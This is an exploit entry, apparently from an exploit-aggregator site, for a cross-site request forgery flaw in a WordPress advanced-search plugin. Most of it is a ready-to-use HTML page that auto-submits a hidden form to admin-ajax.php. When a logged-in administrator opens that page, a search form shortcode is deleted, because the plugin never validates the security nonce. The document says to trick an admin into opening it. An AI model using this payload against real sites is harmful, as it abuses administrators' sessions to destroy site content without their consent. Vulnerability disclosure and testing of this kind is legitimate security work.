Share
## https://sploitus.com/exploit?id=WPEX-ID:5B84145B-F94E-4EA7-84D5-56CF776817A2
Make a logged in admin open the following HTML (replace `__FORM_ID__` with a valid ID):

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php" method="post">
        <input type="hidden" name="action" value="WPAS_Advanced_Search_extra_ajax">
        <input type="hidden" name="ajax_type" value="delete_search">
        <input type="hidden" name="security" value="123">
        <input type="hidden" name="form_id" value="__FORM_ID__">
        <input type="hidden" name="search_form_name" value="">
        <input type="submit" value="Submit Request">
</body>
```

The `security` field isn't validated and the shortcode is deleted.